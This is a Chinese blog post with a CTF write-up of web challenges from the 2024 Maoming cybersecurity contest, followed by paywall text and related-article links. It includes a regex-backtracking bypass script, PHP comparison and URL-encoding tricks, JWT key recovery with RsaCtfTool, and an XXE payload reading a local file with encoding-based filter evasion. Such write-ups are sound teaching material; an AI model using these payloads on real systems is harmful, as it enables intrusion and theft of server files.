2024年茂名市首届网络安全大赛--初赛(党政组)wp

最新推荐文章于 2024-09-22 23:46:25 发布
最新推荐文章于 2024-09-22 23:46:25 发布
阅读量757 收藏 9
点赞数 7
CC 4.0 BY-SA版权
文章标签: 网络安全 web安全 android 汇编 c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ping204568238/article/details/141616292


Web


Web4-初

c493e569e32142a7af8e70b26b89e8a8.png

 

if(isset($_GET['one']) && $_GET['one'] == 0 && $_GET['one'])
php弱比较,通过传入one=0a可满足条件

$query = $_SERVER['QUERY_STRING'];
if(strpos($query,'one') !== false)
$_SERVER['QUERY_STRING']获取url中‘?’后面的内容,然后检测是否包含‘one’子字符串,由于$_SERVER['QUERY_STRING']不会进行url解码,传入%6fne=0a,可满足条件

最后是
if(!is_array($two)){
    if(preg_match('/Love.*flag/is',$two) == false){
        if(strpos($two,'Love flag')!==false){

需要不满足正则匹配 /Love.*flag/is,同时又必须存在 Love flag字符串,可以使用正则回溯漏洞绕过。

脚本:
import requests

data = {'two': 'Love flag' + 'a' * 1000000}

html = requests.post('http://192.168.221.120/',params='%%36%66ne=0a' ,data=data)

print(html.text)


Web5-中


有两个账号
admin/123456
test/123456

478074da74da480e80b484ba9ee7fee8.png
登录后cookie有个token参数,用了jwt,使用rs256算法
admin
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4iLCJpcCI6IjE5Mi4xNjguMjAwLjEifQ.BysxuuRY9Kh0R2O3FOVI3igK9gcYsLmydfrSkP-fHVJu8l0mrY9iD_jf-PIcD4wSJH9r2oJqrNiJdxnm1rt6mDy7U_03Bvc6e_mH_3hH7ySf2uNddkG4wZTY92kTvwl1PQ

 

test
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VyIjoidGVzdCIsImlwIjoiMTkyLjE2OC4yMDAuMSJ9.AvXkg72Z6J8mPT5v-0dB_3cEWmwL16FCX6nNK-NGrAoetEIlqFh9NE-CmldoRagIGEDxdg00m-g-fZ8BKOfZoq5DC5ve8Ge1aCz_gWpFYgZ71AHhmwYCdqOx7Z_J-0hPtQ

登录admin会提示ip被ban了,登录ip存在jwt里面
有了两个rsa加密的jwt,可以去猜公钥

f3a2f83e87414518ac4f337e86eb1f9a.png
跑出来8个公钥

 

https://github.com/Ganapati/RsaCtfTool
python3.9 RsaCtfTool.py --publickey ./public.key --private
跑私钥

3f30ed3ee9eb44e08908b0b0e6727e7f.png

b54076cab9bd45219774b2802c0c898d.png

3ce23b5486864dccbf94abc779af39fd.png

 

点击链接

 6134f05461c74d82a13c78cfc2f85560.png

 

 

可能存在ssrf

点击test是个上传点,上传到内网8000端口

e3092bb48b5341bcbafe2109819b3b3d.png

 

可以判断处理了xml
想要触发xxe过滤了system等关键字
绕过关键字,iconv -f utf8 -t utf-16 2.xml > 3.xml 把payload进行编码上传
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///flag"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>


同时用unicode编码绕过检测
{"url":"oss.jxsec.cn\u003a8000","file":"208d19e4cc6eaaac30c8ad98251b45a7.xml"}

8692b61ecc6c4de296d2808b4aff6587.png

Web6-中

 0e7a924fba6b42189803ef5911c59f06.png

&

最低0.47元/天 解锁文章

200万优质内容无限畅学
lode金夏
关注
k8s部署nacos集群
tingting0119的博客
07-27 336
NACOS_AUTH_TOKEN: #设置一个大于32位的字符串作为Token密钥,并进行Base64编码。NACOS_AUTH_IDENTITY_KEY: # 账户。NACOS_AUTH_IDENTITY_VALUE: #密码。此处镜像为都是手动下载好传入私有仓库的。此处是开启的登录验证。
BUUCTF Crypto RSA详解《1~32》刷题记录
焦虑的焦虑
05-31 3013
BUUCTF Crypto RSA详解wp 《1~32》
base64加密解密在线工具大全
qq_30820239的博客
04-03 8347
可能是迄今为止用过的最好用的base64 加解密工具了,非常方便快捷,上下交换这个有点意思。
好用工具推荐
CSDN_liwaerduo的博客
07-18 332
https://www.pdf2go.com/zh (liyufeng亲测好用)
在线工具清单
张紫娃的博客
07-26 736
github.com → github1s.com → 在线vscode编辑器。
【在线工具】常用在线工具集合
热门推荐
Juruo@Security
05-16 1万+
【在线工具】常用在线工具集合
2024首届茂名市网络安全比赛(茂安杯)初赛部分题目,有crypto、misc、reverse、pwn和moblie的题
08-08
适合ctf爱好者或者参加相关茂名市网安比赛的选手观阅,题目简单蛮适合拿来练手的。
首届广西网络安全技术大赛初赛题目-encoded.zip
02-22
首届广西网络安全技术大赛初赛题目-encoded.zip
2020首届数字四川创新大赛-算法赛道-诈骗电话识别-rank(29779).zip
10-23
【标题】: "2020首届数字四川创新大赛-算法赛道-诈骗电话识别-rank(29779)" 是一个与数据科学竞赛相关的项目,聚焦于利用算法来识别诈骗电话。在这个比赛中,参赛者被挑战去开发高效且精准的模型,以区分正常电话与...
精品资料(2021-2022收藏)全国首届中小学生消防安全知识网络大赛试题初中生.doc
10-10
全国首届中小学生消防安全知识网络大赛试题旨在提高学生们对消防安全的认识和应对火灾的能力。 【判断题解析】 1. 火灾发生时,任何人都应立即报警并尝试救援。这是正确的,但也要确保自身的安全。 2. 燃烧三要素...
gaara我爱罗靶机(靶机6)
2301_77132421的博客
03-28 381
使用nmap扫描确定。
[掘金社区]自动签到脚本
SwBack的博客
08-15 2514
掘金自动签到、免费抽奖脚本,截至24-12-12 有效,掘金签到脚本、掘金自动签到、掘金自动化抽奖
网络空间安全实训日志day4
weixin_62878857的博客
08-30 1135
1.网站:一个社区可以在里面了解它旗下的开源软件(如火狐)的代码等2.XSS:XSS(跨站点脚本)注入是一种针对Web应用程序的安全漏洞,攻击者利用该漏洞向Web页面中注入恶意代码,当其他用户访问该页面时,这些恶意代码就会被执行,从而使攻击者能够窃取用户的信息、篡改用户的数据,甚至控制用户的账户等。分为存储形和反射形3.cookie和session的区别(1)存储位置:Cookie存储在客户端浏览器,Session存储在服务器端。
PHP字符串常用函数
qq_44309969的博客
12-04 171
PHP字符串常用函数 在线练习平台 https://rextester.com/ 下面的函数都是个人常用的函数,还有很多,不会的百度一下 strpos 【字符串中是否包含另一个字符串】 //字符串中包含另一个字符串 if(strpos("abcd123","a")!==false){ echo "字符串中包含另一个字符串"; }else{ echo "字符串中不包含另一个字符串"; } //字符串中不包含另一个字符串 if(strpos("abcd123","
【CTF Reverse】CTFShow re2 Writeup(反编译+XOR+RC4)
HEX9CF的技术博客
08-26 606
30。
ctf竞赛中常见古典密码的解密方法(上)
最新发布
Peter_Qiu54的博客
09-22 875
1.密码特征:仅限字母加密,用一致偏移相同距离的新字母代替原码中的字母,如A加密为D,B加密为E,以此类推,此时偏移量为3。表中数字特征中“√”表示有0-9,特殊符号中“×”表示无特殊符号,“√”表示有较多特殊符号。1.密码特征:通过分移位加密,各种符号(中英文、特殊符号等)都有可能出现。1.密码特征:密文由“-”、“.”或“0”、“1”等两种信号构成。此案例得到结果在偏移量为3时,解密得到的明文为“Hello”。自定义好短码、长码、分隔符、编码间隔、分隔间隔即可。2.解密方法:在线解密网站。
node渠道打包时遇到的问题荣耀 honor 阿里 233 4399 vivo 快手 荣耀
qq_42015021的博客
11-27 3366
这种情况下,可以修改目录的文件名。比如d://123123123//123456.txt,可以修改为d://1//123456.txt,完美解决问题。https://www.aigei.com/tool/image/bg快手联运包kwai有android-base版,android-base(androidx)版. 由于kwai(androidx)版引入了androidx的相关依赖以及appcompat等,而我们聚合sdk demo以及游戏工作室中使用了android-support-v4。存在资源冲突,所
攻防世界miss_01
qq_53105813的博客
07-27 1961
攻防世界题目思路
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值